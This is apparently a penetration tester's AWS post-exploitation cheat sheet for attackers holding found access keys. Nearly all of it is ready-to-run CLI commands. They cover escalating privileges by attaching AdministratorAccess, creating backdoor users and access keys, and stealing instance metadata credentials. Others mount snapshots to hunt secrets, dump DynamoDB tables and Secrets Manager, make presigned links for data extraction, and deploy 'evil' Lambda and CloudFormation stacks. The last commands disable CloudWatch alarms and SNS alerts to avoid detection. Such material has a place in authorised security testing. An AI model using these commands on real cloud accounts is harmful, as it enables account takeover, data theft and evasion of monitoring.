So you found some aws keys...
who is me
aws sts get-caller-identity
who is who
aws iam get-user --user-name AmosBurton --profile initial
aws ec2 describe-instances
aws s3 ls
aws s3api list-buckets
aws iam list-users
aws iam list-roles
aws iam list-groups-for-user --user-name user-example
aws iam list-group-policies --group-name Admins
...
aws iam list-attached-role-policies --role-name ad-example
aws iam list-attached-user-policies --user-name user-example
aws iam list-user-policies --user-name user-example
There are managed policies and inline policies, see here. Check especially for inline policies and everything custom, as these are likly candidates for excessive permissions and priv esc
aws iam get-policy --policy-arn ...
aws iam get-user-policy --user-name user-example --policy-name ...
aws iam get-policy-version --policy-arn ... --version-id v1
aws iam get-role-policy --role-name ... --policy-name ...
In the policy docs check also for autogenerated policies, e.g via terraform und look where the wildcards are, happens these are missconfigured, or simply the wrong wildcard at the wrong place. This can somethymes provide an opportunity to assume roles which, nobody thought you should...
attach aws managed all admin policies
aws iam attach-user-policy --user-name user-example --policy-arn ...
aws iam attach-user-policy --user-name user-example --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws iam attach-group-policy --group-name developer --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
add custom policy .json to group, role (needs your own policy file obviously)
aws iam create-policy-version --policy-arn arn:aws:iam::666666666666:policy/Print --policy-document file:///.../newAdminPolicy.json --set-as-default
aws iam put-group-policy --group-name Admins --policy-document file:///.../newAdminPolicy.json --policy-name AdminRoot
aws iam put-role-policy --role-name developerlambda --policy-name AdminMeow --policy-document file:///.../newAdminPolicy.json
aws iam list-role-policies --role-name admin
aws iam get-role-policy --role-name admin --policy-name AddUser
aws sts assume-role --role-arn arn:aws:iam::666666666666:role/ad-example --role-session-name ad-example
This is my favorite cheetsheet on the whole citadel
aws sts assume-role --role-arn arn:aws:iam::666666666666:role/role-name --role-session-name "Garrus" --profile initial_temp > assume-role-output.txt
aws iam list-policies | grep 'AdministratorAccess'
This shows you aws defaults with AdministratorAccess, you can also search for admin
aws iam list-policies | grep 'Manfred'
aws iam list-policies | grep 'developer'
aws iam list-policies | grep 'snowcrashLambda'
Custom policies are good to look at, use developer, engineer and such, but also try for names of peeple in org you know, maybe there is something just intedend for them, or use names of discovered important services or parts of the org, as those are often attached to make things work and as they are not from aws itself they are (in my expierience) more likely to be misconfigured
aws iam add-user-to-group --group-name developer --user-name kevin
aws iam create-login-profile --user-name mandy --password compliance123! --no-password-reset-required
aws iam create-user --user-name backdoorbeaver
aws iam create-access-key --user-name Bob
aws ec2 describe-subnets
aws ec2 describe-security-groups
aws iam list-instance-profiles
aws ec2 describe-images --owners amazon --filters 'Name=name,Values=amzn-ami-hvm-*-x86_64-gp2' 'Name=state,Values=available' --output json | jq -r '.Images | sort_by(.CreationDate) | last(.[]).ImageId'
aws ec2 run-instances --subnet-id subnet-.... --image-id ami-... --iam-instance-profile Name=ec2_admin --instance-type t2.micro --security-group-ids "sg-..."
aws ec2 authorize-security-group-ingress --group-id ... --protocol tcp --port 22 --cidr 0.0.0.0
aws ec2 describe-iam-instance-profile-associations --region us-east-2 --profile initial
aws ec2 describe-instance-attribute --attribute userData --instance-id instance-id
curl http://169.254.169.254/latest/meta-data
curl http://169.254.169.254/latest/user-data
curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance
aws ec2 create-key-pair --key-name nyankey --query 'KeyMaterial' --output text | out-file -encoding ascii -filepath nyankey.pem
chmod 400 mighty.pem
Find linked snapshots, somethymes EC2 is deactivated but stuff is in ebs. Then one can try and create a volume, attach it to own ec2 and look for creds or templates. Always yearn for the yaml
aws ec2 describe-snapshots --owner-ids self --profile ec2_dev
Create a volume from an existing snapshot
aws ec2 create-volume --snapshot-id SnapshotID --availability-zone eu-central-1 --profile ec2_dev
Attach this volume to an EC2
aws ec2 attach-volume --volume-id 6666 --instance-id 6666 --device /dev/mandy --profile ec2_dev
aws dynamodb list-tables | jq -r .TableNames[]
aws dynamodb scan --table-name secrettable-233223 --region us-east-1
aws secretsmanager list-secrets --filter Key="name",Values="Area51" --profile compromised
aws secretsmanager get-secret-value --secret-id ...--region us-east-1
list buckets, get objects, acl and policy, via api and not via api
aws s3 ls --profile random_aws_keys
aws s3 --no-sign-request --region ap-southeast-1 ls s3://static-resources-example
aws s3 sync s3://user-resources-12jljlaj3434ljalsjf/ ./
aws s3api list-buckets
aws s3api list-objects --bucket ...
aws s3api get-object --bucket normandy --key garrus_great.jpg /home/casually_calibrating.png
aws s3api get-bucket-policy --bucket ... --output text | python -m json.tool
aws s3api get-bucket-acl --bucket ... > acl.json
aws s3api get-object-acl --bucket ... --key secret_object > object.json
--no-sign-request means you do not send aws creds. Always, in the context of S3 try with valid aws creds, they do not have to be assoziated with your test. Why? Check my blogpost for why. ->To Blogpost
add your own policy or acl file to bucket/object
aws s3api put-bucket-policy --bucket ... --policy file://policy.json
aws s3api put-object-acl --bucket ... --key secret_object --access-control-policy file://object.json
aws s3api put-bucket-acl --bucket --access-control-policy file://acl.json
gen a pres-ign link for extraction
aws s3 presign s3://bucket-lemmestealdis/Huliðshjálmr --expires-in 605321
list, show rest-api, ressources method and key
aws apigateway get-account
aws apigateway get-rest-apis
aws apigateway get-api-keys
aws apigateway get-api-key --api-key ... --include-value
aws apigateway get-ressources --rest-api-id ...
aws apigateway get-method --rest-api-id ... --http-method GET --ressource-id ...
aws lambda list-functions
aws lambda get-function --function-name DynamoFunction
aws lambda get-policy --function-name pawsitivty
Create your own evil lambda function and invoke, check here for how to
aws lambda create-function --function-name Ishimura --zip-file fileb://Ishimura.zip --handler index.handler --runtime nodejs18.x --role arn:aws:iam::666666666666:role/lambda-ex
aws lambda invoke --function-name Ishimura marker.txt
aws cloudformation list-stack-resources --stack-name weatherman
aws cloudformation describe-stack-events --stack-name intensification90
aws cloudformation get-template --stack-name stackmanfred
aws cloudformation validate-template --template-body file://evil.yaml
aws cloudformation create-stack --template-body file://evil.yaml --stack-name stolenstack --parameters ParameterKey=uri,ParameterValue=$uri --output text
aws cloudformation describe-stacks --stack-name stolenstack --query Stacks[*].Outputs --output text
aws cloudformation delete-stack --stack-name stolenstack --output text
aws cloudformation list-stack-resources --stack-name weatherman
aws cloudformation describe-stack-events --stack-name intensification90
aws cloudformation get-template --stack-name stackmanfred
aws ecr describe-repositories
aws ecr get-repository-policy --repository-name StargateWasActualyNice
aws ecr list-images --repository-name AlwaysHardstyle
aws ecr describe-images --repository-name HansJoerg --image-ids imageTag=Hannelore
aws ecs describe-clusters --cluster hiro
aws eks list-fargate-profiles --cluster-name GreedoDidNothingWrong
Check meta-data via
cmd=cat /var/run/secrets/kubernetes.io/
If there are alarms monitoring in cloudwatch, sns and you have permissions, identify and if needed deactivate them.
aws cloudwatch describe-alarms --alarm-names "soundofdapolice"
aws sns list-topics
aws sns list-subscriptions
aws cloudwatch disable-alarm-actions --alarm-names soundofdapolice
aws cloudwatch describe-alarm-history --alarm-name "iamshadow" --history-item-type StateUpdate
aws sns unsubscribe --subscription-arn arn:aws:sns:us-west-2:666666666666:my-topic:somerandomstring